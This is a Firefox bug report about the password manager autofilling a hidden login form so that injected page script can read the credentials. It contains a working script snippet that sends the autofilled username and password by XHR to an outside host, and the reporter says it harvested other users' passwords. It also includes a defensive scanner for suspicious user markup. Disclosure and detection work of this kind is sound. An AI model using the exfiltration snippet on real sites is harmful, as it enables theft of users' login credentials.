Closed Bug 504047 Opened 16 years ago Closed 4 years ago

Password manager allows third party scripts to get passwords

Categories

(Firefox :: Security, defect)

3.5 Branch
defect
Not set
major

RESOLVED INCOMPLETE

People

(Reporter: buri.buster, Unassigned)

Details

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1) Gecko/20090624 Firefox/3.5 AutoPager/0.5.2.2 (http://www.teesoft.info/)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1) Gecko/20090624 Firefox/3.5 AutoPager/0.5.2.2 (http://www.teesoft.info/)

I've been browsing a webpage (a forum that I trust), where the noticeboards are made by users. There is no blocking for HTML elements, including scripts. The problem is the following: the noticeboard has the same login form as the entire page and some XHR object. The password manager automatically fills in the login information and allows XHR to send it to a third-party site.

Reproducible: Always

Steps to Reproduce:
1. Here is the sample code from that site. The login form is the same as the page's one; Request() is the XHR object. The site is using the MooTools framework (http://www.mootools.net)

<script type="text/javascript">
var r = new Request({url:'http://my.site.com', method:'get'});
window.addEvent('load', function(e){
    r.send('u=' + $('login').value + '&p=' + $('pass').value);
});
</script>
<form class='profile-form' action='/' style="display:none;" method='post' onsubmit='return md5form(this)'>
    <input type="hidden" name="challenge" value="52260" />
    <input type="hidden" name="password_hmac" value="" />
    <input type='hidden' name='log_process' value='1' />
    <label>Login : <input type='text' name='login' id="login" /></label>
    <label>Heslo : <input type='password' name='pass' id="pass" /></label>
    <input type='submit' value='Přihlásit' id='profile-button' />
</form>

Actual Results:
I've obtained passwords for multiple profiles of other people.

Expected Results:
Login forms should be filled just graphically, until "Log-in" is pressed, or something like that.
Version: unspecified → 3.5 Branch
I just constructed a test case for this at http://www.kylehuey.com/moz/504047.php . Confirming. I don't see any way to take advantage of this without an XSS vulnerability in the host site though, which it sounds like that forum is full of.
Status: UNCONFIRMED → NEW
Ever confirmed: true
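
The markup pattern reported above (a script plus a hidden copy of the login form inside user-supplied content) can be flagged in stored posts before they are rendered. This is an added example, not code from the bug report or from Firefox: `auditUserHtml`, the finding labels and both sample posts are constructed for illustration, and the regex tokenizer is a review aid that does not replace escaping or sanitizing user HTML.

```javascript
// Added example: triage scan over stored user markup. All names are hypothetical.
// The regex tokenizer only flags posts for review; it is not a sanitizer.
const TAG = /<\s*([a-zA-Z][\w-]*)\b([^<>]*)>/g;
const ATTR = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Split markup into opening tags with lower-cased names and attribute maps.
function parseTags(html) {
  const tags = [];
  for (const m of html.matchAll(TAG)) {
    const attrs = {};
    for (const a of m[2].matchAll(ATTR)) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
    }
    tags.push({ name: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// Return a sorted list of findings relevant to autofilled-credential theft.
function auditUserHtml(html) {
  const findings = new Set();
  for (const { name, attrs } of parseTags(html)) {
    if (name === 'script') findings.add('script-element');
    if (Object.keys(attrs).some((k) => k.startsWith('on'))) findings.add('event-handler');
    if (name === 'form') findings.add('form-element');
    if (name === 'input' && (attrs.type || '').toLowerCase() === 'password') {
      findings.add('password-field');
    }
    if (name === 'form' && /display\s*:\s*none/i.test(attrs.style || '')) {
      findings.add('hidden-form');
    }
  }
  return [...findings].sort();
}

// Constructed sample posts (not taken from any real site).
const benignPost = '<p>Meeting on <b>Friday</b> at 18:00.</p>';
const suspectPost =
  '<script type="text/javascript">/* reads #login and #pass */</script>' +
  "<form action='/' style=\"display:none;\" method='post' onsubmit='return md5form(this)'>" +
  "<input type='text' name='login' id=\"login\" />" +
  "<input type='password' name='pass' id=\"pass\" /></form>";

console.log(auditUserHtml(benignPost));
console.log(auditUserHtml(suspectPost));
```
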
Opera-like sending of login information only on a keyboard shortcut would prevent this glitch. If the page tries to send the login form, the user can get prompted or empty fields could be sent.

Marking this as Resolved > Incomplete since the last activity on this issue was 13 years ago and it might not be relevant anymore.
Feel free to re-open if the issue is still reproducible on your end in the latest FF versions.

Status: NEW → RESOLVED
Closed: 4 years ago
Resolution: --- → INCOMPLETE